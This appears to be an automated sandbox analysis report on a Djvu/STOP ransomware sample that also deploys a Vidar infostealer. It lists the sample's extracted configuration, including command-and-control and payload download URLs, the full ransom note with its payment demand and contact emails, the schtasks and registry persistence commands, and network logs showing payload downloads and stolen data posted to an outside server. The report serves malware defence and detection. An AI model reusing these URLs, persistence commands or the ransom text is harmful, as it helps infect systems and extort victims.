Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
144s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
16/07/2023, 12:15 UTC
Static task
static1
Behavioral task
behavioral1
Sample
c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
Resource
win10v2004-20230703-en
General
-
Target
c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
-
Size
812KB
-
MD5
73ecaf10be2b83a9a1e77d3235865eac
-
SHA1
3236e7d9b443a757dbc4dcf902d78c2f8dfaebed
-
SHA256
c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd
-
SHA512
b2c9df901501146d740c0449d3424f2782307463cb5743ca5d03db2714e6d0291d7c66b9b85c55ab4f14a975ae4da429218fbc3bf41cf2f9747a6f3aaca28988
-
SSDEEP
12288:2LQHLjpgE7N1EqephL/prRX54Svv9otwos0CBre7/6eai0Ir7FO:jfSExZephLVRWSv9obsxVhXIPFO
Malware Config
Extracted
djvu
http://zexeq.com/raud/get.php
-
extension
.miqe
-
offline_id
1S27jnaC9TYNiwf9VvJvIx5XCXvgyoDAUXHnu0t1
-
payload_url
http://colisumy.com/dl/build2.exe
http://zexeq.com/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-nSxayRgUNO Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@freshmail.top Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0746Pokj
Extracted
vidar
4.7
https://t.me/eagl3z
https://t.me/eagl3z
https://steamcommunity.com/profiles/76561199159550234
-
profile_id_v2
https://t.me/eagl3z
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1788.0 uacq
Signatures
-
Detected Djvu ransomware 17 IoCs
resource yara_rule behavioral1/memory/1176-135-0x0000000002440000-0x000000000255B000-memory.dmp family_djvu behavioral1/memory/540-136-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/540-137-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/540-138-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/540-139-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/540-148-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/5008-153-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/5008-154-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/5008-156-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/5008-157-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/5008-162-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/5008-163-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/5008-167-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/5008-169-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/5008-170-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/5008-195-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/5008-284-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\International\Geo\Nation c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe Key value queried \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\International\Geo\Nation c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe -
Executes dropped EXE 4 IoCs
pid Process 4596 build2.exe 908 build2.exe 2104 build3.exe 2832 mstsca.exe -
Loads dropped DLL 2 IoCs
pid Process 908 build2.exe 908 build2.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 2740 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\211697e2-eae8-42ec-8785-08c77492616d\\c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe\" --AutoStart" c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 21 api.2ip.ua 35 api.2ip.ua 20 api.2ip.ua -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1176 set thread context of 540 1176 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 91 PID 3908 set thread context of 5008 3908 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 97 PID 4596 set thread context of 908 4596 build2.exe 99 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build2.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1040 schtasks.exe 5040 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 540 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 540 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 5008 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 5008 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 908 build2.exe 908 build2.exe 908 build2.exe 908 build2.exe 908 build2.exe 908 build2.exe -
Suspicious use of WriteProcessMemory 47 IoCs
description pid Process procid_target PID 1176 wrote to memory of 540 1176 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 91 PID 1176 wrote to memory of 540 1176 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 91 PID 1176 wrote to memory of 540 1176 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 91 PID 1176 wrote to memory of 540 1176 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 91 PID 1176 wrote to memory of 540 1176 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 91 PID 1176 wrote to memory of 540 1176 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 91 PID 1176 wrote to memory of 540 1176 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 91 PID 1176 wrote to memory of 540 1176 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 91 PID 1176 wrote to memory of 540 1176 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 91 PID 1176 wrote to memory of 540 1176 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 91 PID 540 wrote to memory of 2740 540 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 93 PID 540 wrote to memory of 2740 540 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 93 PID 540 wrote to memory of 2740 540 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 93 PID 540 wrote to memory of 3908 540 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 94 PID 540 wrote to memory of 3908 540 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 94 PID 540 wrote to memory of 3908 540 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 94 PID 3908 wrote to memory of 5008 3908 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 97 PID 3908 wrote to memory of 5008 3908 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 97 PID 3908 wrote to memory of 5008 3908 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 97 PID 3908 wrote to memory of 5008 3908 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 97 PID 3908 wrote to memory of 5008 3908 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 97 PID 3908 wrote to memory of 5008 3908 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 97 PID 3908 wrote to memory of 5008 3908 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 97 PID 3908 wrote to memory of 5008 3908 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 97 PID 3908 wrote to memory of 5008 3908 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 97 PID 3908 wrote to memory of 5008 3908 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 97 PID 5008 wrote to memory of 4596 5008 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 98 PID 5008 wrote to memory of 4596 5008 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 98 PID 5008 wrote to memory of 4596 5008 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 98 PID 4596 wrote to memory of 908 4596 build2.exe 99 PID 4596 wrote to memory of 908 4596 build2.exe 99 PID 4596 wrote to memory of 908 4596 build2.exe 99 PID 4596 wrote to memory of 908 4596 build2.exe 99 PID 4596 wrote to memory of 908 4596 build2.exe 99 PID 4596 wrote to memory of 908 4596 build2.exe 99 PID 4596 wrote to memory of 908 4596 build2.exe 99 PID 4596 wrote to memory of 908 4596 build2.exe 99 PID 4596 wrote to memory of 908 4596 build2.exe 99 PID 5008 wrote to memory of 2104 5008 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 100 PID 5008 wrote to memory of 2104 5008 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 100 PID 5008 wrote to memory of 2104 5008 c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe 100 PID 2104 wrote to memory of 1040 2104 build3.exe 102 PID 2104 wrote to memory of 1040 2104 build3.exe 102 PID 2104 wrote to memory of 1040 2104 build3.exe 102 PID 2832 wrote to memory of 5040 2832 mstsca.exe 105 PID 2832 wrote to memory of 5040 2832 mstsca.exe 105 PID 2832 wrote to memory of 5040 2832 mstsca.exe 105
Processes
-
C:\Users\Admin\AppData\Local\Temp\c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe"C:\Users\Admin\AppData\Local\Temp\c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1176 -
C:\Users\Admin\AppData\Local\Temp\c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe"C:\Users\Admin\AppData\Local\Temp\c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe"2⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:540 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\211697e2-eae8-42ec-8785-08c77492616d" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:2740
-
-
C:\Users\Admin\AppData\Local\Temp\c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe"C:\Users\Admin\AppData\Local\Temp\c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe" --Admin IsNotAutoStart IsNotTask3⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3908 -
C:\Users\Admin\AppData\Local\Temp\c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe"C:\Users\Admin\AppData\Local\Temp\c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5008 -
C:\Users\Admin\AppData\Local\2204781c-229b-46c5-af25-4f4f30ce3f7b\build2.exe"C:\Users\Admin\AppData\Local\2204781c-229b-46c5-af25-4f4f30ce3f7b\build2.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4596 -
C:\Users\Admin\AppData\Local\2204781c-229b-46c5-af25-4f4f30ce3f7b\build2.exe"C:\Users\Admin\AppData\Local\2204781c-229b-46c5-af25-4f4f30ce3f7b\build2.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:908
-
-
-
C:\Users\Admin\AppData\Local\2204781c-229b-46c5-af25-4f4f30ce3f7b\build3.exe"C:\Users\Admin\AppData\Local\2204781c-229b-46c5-af25-4f4f30ce3f7b\build3.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"6⤵
- Creates scheduled task(s)
PID:1040
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"2⤵
- Creates scheduled task(s)
PID:5040
-
Network
-
Remote address:8.8.8.8:53Request126.50.247.8.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request2.136.104.51.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestapi.2ip.uaIN AResponseapi.2ip.uaIN A162.0.217.254
-
GEThttps://api.2ip.ua/geo.jsonc5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exeRemote address:162.0.217.254:443RequestGET /geo.json HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: api.2ip.ua
ResponseHTTP/1.1 429 Too Many Requests
Server: Apache
Strict-Transport-Security: max-age=63072000; preload
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block; report=...
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
Upgrade: h2,h2c
Connection: Upgrade
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Request254.217.0.162.in-addr.arpaIN PTRResponse254.217.0.162.in-addr.arpaIN PTRnondutiable-rshinitrdnsweb-hostingcom
-
Remote address:8.8.8.8:53Request101.14.18.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request101.15.18.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request208.194.73.20.in-addr.arpaIN PTRResponse
-
GEThttps://api.2ip.ua/geo.jsonc5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exeRemote address:162.0.217.254:443RequestGET /geo.json HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: api.2ip.ua
ResponseHTTP/1.1 429 Too Many Requests
Server: Apache
Strict-Transport-Security: max-age=63072000; preload
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block; report=...
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
Upgrade: h2,h2c
Connection: Upgrade
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Requestcolisumy.comIN AResponsecolisumy.comIN A189.245.23.185colisumy.comIN A211.171.233.126colisumy.comIN A201.124.98.97colisumy.comIN A123.140.161.243colisumy.comIN A211.53.230.67colisumy.comIN A220.82.134.215colisumy.comIN A151.251.31.98colisumy.comIN A154.182.153.162colisumy.comIN A189.232.51.144colisumy.comIN A80.210.25.252
-
GEThttp://colisumy.com/dl/build2.exec5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exeRemote address:189.245.23.185:80RequestGET /dl/build2.exe HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: colisumy.com
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
Last-Modified: Mon, 10 Jul 2023 14:24:53 GMT
ETag: "6fc00-60022bf0382f8"
Accept-Ranges: bytes
Content-Length: 457728
Connection: close
Content-Type: application/octet-stream
-
Remote address:8.8.8.8:53Requestzexeq.comIN AResponsezexeq.comIN A196.188.169.138zexeq.comIN A187.156.105.40zexeq.comIN A109.175.29.39zexeq.comIN A62.217.232.10zexeq.comIN A201.119.15.212zexeq.comIN A190.219.153.101zexeq.comIN A190.187.52.42zexeq.comIN A211.40.39.251zexeq.comIN A211.171.233.129zexeq.comIN A222.236.49.123
-
GEThttp://zexeq.com/raud/get.php?pid=94E1BC88C047D2BC5A0CD5F3E0382D82&first=truec5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exeRemote address:196.188.169.138:80RequestGET /raud/get.php?pid=94E1BC88C047D2BC5A0CD5F3E0382D82&first=true HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: zexeq.com
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.37 (Win64) PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 563
Connection: close
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Request185.23.245.189.in-addr.arpaIN PTRResponse185.23.245.189.in-addr.arpaIN PTRhost-185-23-static-245-189 uninet-idecommx
-
Remote address:8.8.8.8:53Request138.169.188.196.in-addr.arpaIN PTRResponse
-
GEThttp://zexeq.com/files/1/build3.exec5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exeRemote address:196.188.169.138:80RequestGET /files/1/build3.exe HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: zexeq.com
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.37 (Win64) PHP/5.6.40
Last-Modified: Sat, 31 Jul 2021 08:44:14 GMT
ETag: "2600-5c86757379380"
Accept-Ranges: bytes
Content-Length: 9728
Connection: close
Content-Type: application/x-msdownload
-
Remote address:8.8.8.8:53Requestt.meIN AResponset.meIN A149.154.167.99
-
Remote address:149.154.167.99:443RequestGET /eagl3z HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0
Host: t.me
ResponseHTTP/1.1 200 OK
Date: Sun, 16 Jul 2023 12:15:58 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12323
Connection: keep-alive
Set-Cookie: stel_ssid=37db46294837fb98ba_1894581439611601703; expires=Mon, 17 Jul 2023 12:15:58 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
-
Remote address:128.140.92.122:8081RequestGET /cbd613607c301b91658bcf8a9e38cc6a HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1788.0 uacq
Host: 128.140.92.122:8081
ResponseHTTP/1.1 200 OK
Date: Sun, 16 Jul 2023 12:15:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:128.140.92.122:8081RequestGET /files.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1788.0 uacq
Host: 128.140.92.122:8081
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 16 Jul 2023 12:15:58 GMT
Content-Type: application/zip
Content-Length: 2685679
Last-Modified: Mon, 12 Sep 2022 13:14:59 GMT
Connection: keep-alive
ETag: "631f30d3-28faef"
Accept-Ranges: bytes
-
Remote address:128.140.92.122:8081RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----7708045882433214
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1788.0 uacq
Host: 128.140.92.122:8081
Content-Length: 157337
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 16 Jul 2023 12:16:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:8.8.8.8:53Request99.167.154.149.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request22.249.124.192.in-addr.arpaIN PTRResponse22.249.124.192.in-addr.arpaIN PTRcloudproxy10022sucurinet
-
Remote address:8.8.8.8:53Request122.92.140.128.in-addr.arpaIN PTRResponse122.92.140.128.in-addr.arpaIN PTRstatic12292140128clientsyour-serverde
-
Remote address:8.8.8.8:53Request56.126.166.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request254.109.26.67.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request63.13.109.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request57.169.31.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request202.74.101.95.in-addr.arpaIN PTRResponse202.74.101.95.in-addr.arpaIN PTRa95-101-74-202deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request5.173.189.20.in-addr.arpaIN PTRResponse
-
162.0.217.254:443https://api.2ip.ua/geo.jsontls, httpc5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe1.0kB 8.1kB 14 10
HTTP Request
GET https://api.2ip.ua/geo.jsonHTTP Response
429 -
162.0.217.254:443https://api.2ip.ua/geo.jsontls, httpc5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe1.2kB 8.2kB 17 12
HTTP Request
GET https://api.2ip.ua/geo.jsonHTTP Response
429 -
189.245.23.185:80http://colisumy.com/dl/build2.exehttpc5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe16.0kB 471.8kB 345 344
HTTP Request
GET http://colisumy.com/dl/build2.exeHTTP Response
200 -
196.188.169.138:80http://zexeq.com/raud/get.php?pid=94E1BC88C047D2BC5A0CD5F3E0382D82&first=truehttpc5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe412 B 979 B 6 5
HTTP Request
GET http://zexeq.com/raud/get.php?pid=94E1BC88C047D2BC5A0CD5F3E0382D82&first=trueHTTP Response
200 -
196.188.169.138:80http://zexeq.com/files/1/build3.exehttpc5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe692 B 10.5kB 13 12
HTTP Request
GET http://zexeq.com/files/1/build3.exeHTTP Response
200 -
1.5kB 19.4kB 24 20
HTTP Request
GET https://t.me/eagl3zHTTP Response
200 -
269.4kB 2.8MB 2119 2064
HTTP Request
GET http://128.140.92.122:8081/cbd613607c301b91658bcf8a9e38cc6aHTTP Response
200HTTP Request
GET http://128.140.92.122:8081/files.zipHTTP Response
200HTTP Request
POST http://128.140.92.122:8081/HTTP Response
200
-
71 B 125 B 1 1
DNS Request
126.50.247.8.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
2.136.104.51.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
56 B 72 B 1 1
DNS Request
api.2ip.ua
DNS Response
162.0.217.254
-
72 B 126 B 1 1
DNS Request
254.217.0.162.in-addr.arpa
-
72 B 134 B 1 1
DNS Request
101.14.18.104.in-addr.arpa
-
72 B 134 B 1 1
DNS Request
101.15.18.104.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
208.194.73.20.in-addr.arpa
-
58 B 218 B 1 1
DNS Request
colisumy.com
DNS Response
189.245.23.185211.171.233.126201.124.98.97123.140.161.243211.53.230.67220.82.134.215151.251.31.98154.182.153.162189.232.51.14480.210.25.252
-
55 B 215 B 1 1
DNS Request
zexeq.com
DNS Response
196.188.169.138187.156.105.40109.175.29.3962.217.232.10201.119.15.212190.219.153.101190.187.52.42211.40.39.251211.171.233.129222.236.49.123
-
73 B 131 B 1 1
DNS Request
185.23.245.189.in-addr.arpa
-
74 B 135 B 1 1
DNS Request
138.169.188.196.in-addr.arpa
-
50 B 66 B 1 1
DNS Request
t.me
DNS Response
149.154.167.99
-
73 B 166 B 1 1
DNS Request
99.167.154.149.in-addr.arpa
-
73 B 113 B 1 1
DNS Request
22.249.124.192.in-addr.arpa
-
73 B 131 B 1 1
DNS Request
122.92.140.128.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
56.126.166.20.in-addr.arpa
-
72 B 126 B 1 1
DNS Request
254.109.26.67.in-addr.arpa
-
71 B 145 B 1 1
DNS Request
63.13.109.52.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
57.169.31.20.in-addr.arpa
-
72 B 137 B 1 1
DNS Request
202.74.101.95.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
5.173.189.20.in-addr.arpa
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
Filesize2KB
MD5ec50490b07b4d77ae984e14377e81faf
SHA174330d98bc1ef271a37b3ae273efcccab1c335be
SHA25630afe1a3bcc9efa0dd4619e272548ef4ecc76817e67e04f69cb83f1e4380d716
SHA5123972532782f05f3d24f6e8e3ab8362dfc2603c24ffe5728404977b4d13f3dc360b76b6ab8056da98845f53d5d12d9d24981d0e6edcc042d0b885114417945c8f
-
